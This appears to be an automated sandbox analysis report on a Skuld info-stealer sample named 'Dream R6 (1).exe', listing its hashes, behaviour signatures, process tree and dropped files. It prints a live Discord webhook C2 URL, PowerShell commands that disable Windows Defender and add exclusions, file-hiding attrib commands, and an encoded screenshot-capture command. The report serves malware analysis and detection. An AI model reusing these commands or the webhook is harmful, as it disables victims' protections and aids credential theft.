Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-08-2024 16:12

General

  • Target

    Dream R6 (1).exe

  • Size

    6.1MB

  • MD5

    098079241a31077ce464dedd564d5965

  • SHA1

    5a4a1395ce3f7aca2de4eba960e579bc91ec2a07

  • SHA256

    fa5e08c10b5436ce62146da3783126a903a7e1d545f10c1a0984f40daf8c1d35

  • SHA512

    f70f1996406ea498e6e2d871d05803ba121bb4fc3a35250aea626df612446d7d197aba9cfe7293534fd76fcd88721ed406349d74b747c43d2a5d9846866fed51

  • SSDEEP

    98304:OL8TZt27hpBDNQZx92UWUfeeM81EztJwRla6dewnqOQL7Xwivl/gn6MsyB:OwY1PL8GfNURsRe87jdQc

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1275570777562943619/CfD-pRhASNI97yrXg8BssfRJRJrGeagBhz72dQfdjXc70hZ50lirmSwHec53Jx0RZ28B

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dream R6 (1).exe
    "C:\Users\Admin\AppData\Local\Temp\Dream R6 (1).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4968
    • C:\Windows\system32\cmd.exe
      cmd.exe /C start /b C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
        C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2444
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
          4⤵
          • Views/modifies file attributes
          PID:2300
        • C:\Windows\system32\attrib.exe
          attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
          4⤵
          • Views/modifies file attributes
          PID:5056
        • C:\Windows\System32\Wbem\wmic.exe
          wmic csproduct get UUID
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1936
        • C:\Windows\System32\Wbem\wmic.exe
          wmic path win32_VideoController get name
          4⤵
          • Detects videocard installed
          • Suspicious use of AdjustPrivilegeToken
          PID:4564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:3292
        • C:\Windows\System32\Wbem\wmic.exe
          wmic os get Caption
          4⤵
            PID:4916
          • C:\Windows\System32\Wbem\wmic.exe
            wmic cpu get Name
            4⤵
              PID:4320
            • C:\Windows\System32\Wbem\wmic.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:3404
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2560
            • C:\Windows\System32\Wbem\wmic.exe
              wmic csproduct get UUID
              4⤵
                PID:1052
              • C:\Windows\system32\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:4480
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                4⤵
                • Event Triggered Execution: Netsh Helper DLL
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:1788
              • C:\Windows\system32\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:1520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1944
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.cmdline"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2404
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC62E.tmp" "c:\Users\Admin\AppData\Local\Temp\fgpenwup\CSC138F0812606943FDAAFDE81F4E9BCB11.TMP"
                    6⤵
                      PID:3316
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe"
            1⤵
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:408
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8dbf7cc40,0x7ff8dbf7cc4c,0x7ff8dbf7cc58
              2⤵
                PID:4052
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2004,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2000 /prefetch:2
                2⤵
                  PID:4524
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1672,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2036 /prefetch:3
                  2⤵
                    PID:1704
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2264 /prefetch:8
                    2⤵
                      PID:1844
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
                      2⤵
                        PID:4084
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3328 /prefetch:1
                        2⤵
                          PID:3476
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4632,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:1
                          2⤵
                            PID:1336
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4528,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4904 /prefetch:8
                            2⤵
                              PID:4312
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,13501351441587533848,17858962470519788536,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4576 /prefetch:8
                              2⤵
                                PID:1356
                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                              1⤵
                                PID:3900
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                1⤵
                                  PID:516

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                  Filesize

                                  649B

                                  MD5

                                  22b21c686e22e4bc4d0e48049fa77768

                                  SHA1

                                  9b012716dc32f554d041d0023f79de9e32368bd8

                                  SHA256

                                  44820ca83a0806a2203b2f905d57d50dea95c2cf68acb9abeb55e6ef6035740c

                                  SHA512

                                  a712fed5b5383cf3d5284c63630246a251ec3ffbe6efd798b61e457782c64a23148bd88e3ab6ac90c5067ff1c6e695355a43585186c3dad222bb6a78eb496821

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                  Filesize

                                  1KB

                                  MD5

                                  138fc524b0344e9fee0ad97089cb4807

                                  SHA1

                                  ea5b9a401eff9e4d225a31520fb0376e537facd0

                                  SHA256

                                  642c8a249ab9ef9e1692d01fe82db692587e96ef81c82b70723386c2e1d276ba

                                  SHA512

                                  fbb6b8bdfbf004faf3245a91358375b8f6d3ffe90c4691646d701aae23a3d5ba5dbd1d0e448e7a6c62118a7efda3744b8aab99b476c0cd6848ec426ec21a95bf

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                  Filesize

                                  2B

                                  MD5

                                  d751713988987e9331980363e24189ce

                                  SHA1

                                  97d170e1550eee4afc0af065b78cda302a97674c

                                  SHA256

                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                  SHA512

                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                  Filesize

                                  356B

                                  MD5

                                  81c31be16e96d572705ba6ee5568501a

                                  SHA1

                                  48fdcec1a9930a028265598868113ebeaea998d6

                                  SHA256

                                  eac6851d74fdc9f02e4cfd65c3d757c8ff17eace3126e796d10025edfa24f386

                                  SHA512

                                  b97fc78eb1babe4f0d4f60db0d2c2854a30e3dba5a290c1d5207fdaf4bd545468e0f7c08b09595e4071b835fe0b3454fbabc2b6c50eeac32191450707f13b825

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  0fcf4e2088db6732f0dd4d5013760587

                                  SHA1

                                  d128f4a46a5bdd2a30c0cddecd826ed82b09ba72

                                  SHA256

                                  bbc2887a1676a7898362780c8865f128627d26c2d2c7ce91fa862a7b437d7f0b

                                  SHA512

                                  5e3b9af96c99abbd6fa76b5321aacc4a8579fd4b9b680ffbcc5c71b632ec0bc1d47fa1035c2faa28e7bf2da45d02e983b99f1b21638bca6c332206513f887f7c

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  8KB

                                  MD5

                                  85601d52d0e741ed21e21c100acb1cf2

                                  SHA1

                                  d80eccf918adb8726ad1772d6ed5c5039e6466ca

                                  SHA256

                                  d978ce5038c6e0c1dfb8c593c430a253157a52e8b6c7c01366e05aef69eac3eb

                                  SHA512

                                  09eab83d8d2ca9167df3802b475cb0633f9739d6466bc9df09dcac3294acfb05db8870efff4acf8abddc06a54378497d717c7527e7917fa3b880f1cdda97c94b

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  384b16c69f36932d29ec8da1f10d836b

                                  SHA1

                                  519b3965b7f0cd457e7da61ddca2af64072c60a7

                                  SHA256

                                  9e636aec62dc16fe3cf05c9d09bd6b6865b314a55595ed82d490419cdef2b0ae

                                  SHA512

                                  e80dd3f8a49bf45b1cc00a92c69cc94847b9adc00789b938443535bc11fa673d6f1e625774e6d36e0c8e4596f2c6ee3856ce8a7f71fcf3113ab100a9becc8773

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  8KB

                                  MD5

                                  0abd121e892979be04bdfc70b79e5d2e

                                  SHA1

                                  5cec4f75503d77500426b31f501294b57157c520

                                  SHA256

                                  2ac744d69fafda7e6c0068a7b0bbe222d790414264a1fdfd5ccb7d5aa4aadc9a

                                  SHA512

                                  c9f712a9fa88d00b45363fdeed0413dfd26f5a8e49cb29f13c87733dccc33c0578694786096a733e1710f1fcf4979485423fa64dc1fb51b57fd64c00f9deb974

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  f671028d29ce479cb03955b63e28060f

                                  SHA1

                                  6df6d81868cf77cc5b2d9e860126fde93ff228be

                                  SHA256

                                  d5b21b64499b94725ac370f156231c797ad3a01f9dfc1165060909e19dcfa939

                                  SHA512

                                  a9f49ed1ebbe5018041d86f3396937bd214ae2c15e746f17052699035c869dc69ce9c6ba1363fe7f520caa70cc64ac327ed98012a925f4f59d2a23b30bfcc06d

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  9KB

                                  MD5

                                  ee9f310fdfc7da86a62ccc4ef33d5afc

                                  SHA1

                                  d7bb5aeff25910f75c7ef9b57fbed906c355d0e1

                                  SHA256

                                  0ff5818a0647208ea67f4df6adc7dff87db1c9a5b0fca90b9212b8f9d81a35c5

                                  SHA512

                                  b5eccbaaa5a53b8a684a19a0d45fcdb7ec814392c35832acd47591713dd4f5e54a31fc41637ca78629fe6f0723dc9d989b05bac61764b4ef8f10739d78383230

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                  Filesize

                                  15KB

                                  MD5

                                  5b26519501ae8fddfe192324bb7cbd0c

                                  SHA1

                                  8eddcd0e8ae14432496cd58173f6cfe95a928c24

                                  SHA256

                                  8298fd3f2476f722bc010a92cdb4391303fff898929ec467b17b51325437e77b

                                  SHA512

                                  94287a482485f605073bfd9c5463c322df16dc837905614a1435808042e275ad81d11a018384c04440ff9d2adea8fca43f692bd8c4c0519f229a57cf6e27b94b

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                  Filesize

                                  201KB

                                  MD5

                                  17dc289b7169d88065803b866c07a9e7

                                  SHA1

                                  6a8f9f2c385225f2bcc3d4fc030ca43000589008

                                  SHA256

                                  36d1d3e064691a9c251c01e966e75a3e53c916b42dbc376c6f98425467b8acf5

                                  SHA512

                                  0b23a013e7a524a370a8efd6278a5245bbc7daee03d35dc58aa3a1265a2456f0a70c34556d9ba2312db95c49183b5b5cc45f21af22192959e30694130a1e84e6

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                  Filesize

                                  201KB

                                  MD5

                                  0e23f566a884232bf70ef0afb22e81c4

                                  SHA1

                                  3d12a9337d2fa5aeaab36e63d0f0f8159e1a3772

                                  SHA256

                                  341abe8bf7fa94b2aba436ad062ba9a74e2fdfcd43c00add6cd2f45cb439188b

                                  SHA512

                                  0479b3131f3b11a1c57c06e271640f717fb099d17e8056a5c07dbfeb7827ad4c34af4ecc6a4184f635d92c1010be5c7576d0e30bb3828f04f2f7167a6cd7ca44

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  d85ba6ff808d9e5444a4b369f5bc2730

                                  SHA1

                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                  SHA256

                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                  SHA512

                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  77d622bb1a5b250869a3238b9bc1402b

                                  SHA1

                                  d47f4003c2554b9dfc4c16f22460b331886b191b

                                  SHA256

                                  f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                  SHA512

                                  d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  d8cb3e9459807e35f02130fad3f9860d

                                  SHA1

                                  5af7f32cb8a30e850892b15e9164030a041f4bd6

                                  SHA256

                                  2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                  SHA512

                                  045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                • C:\Users\Admin\AppData\Local\Temp\7626342d-72a5-f113-464a-9e601517bf61.exe

                                  Filesize

                                  9.9MB

                                  MD5

                                  1794788462c41d14e2659260f134a304

                                  SHA1

                                  e977afbac54e557b917abe2604eddee4c72fe297

                                  SHA256

                                  8f2f5de00ac8de98139e3c9a802bedae0368714ea3714eba37ef5778bff86a9d

                                  SHA512

                                  941d567e3316a4388d3554b14a1bf9af8254475811559b253dc9428b1e9c2de4d7d1f307fec9719b2c5968d3893d204d5d189fe312afe5913ff17572bbae2aff

                                • C:\Users\Admin\AppData\Local\Temp\KI16VAYtQ6\Display (1).png

                                  Filesize

                                  419KB

                                  MD5

                                  d2923405b2760b7a0b7ad9d72b7accb9

                                  SHA1

                                  04ebd46a89d5d62d4db3a16d2ef3f961adbc9ced

                                  SHA256

                                  5e1e432132ee4194dbc5c7a8c272480c10c5737413d83db5b2011b05ebbd1bb8

                                  SHA512

                                  5d9398e077246780633541ce8437e2140e75b385362893b1111015f2082a734331e867553daeca9900ca1e698fd1f2cf2ffc93caa3faddfb153db3d97f8c7822

                                • C:\Users\Admin\AppData\Local\Temp\RESC62E.tmp

                                  Filesize

                                  1KB

                                  MD5

                                  8de06d74aa515c9511fb4af34c666e2d

                                  SHA1

                                  cc751046dcc4994f0c028b215bae4acf450ecbe7

                                  SHA256

                                  e00990ba633acfb1428b130b903075ccbba73e17441e2f529dbd3b3d5e0f9534

                                  SHA512

                                  29fe1d4711825c4aae87be03847009ceebccfe3e3fbe3e0b61f51ec1b3259747452c185ced208506d7e76315280eaedd64346afaed4e15f23160663d1e33a586

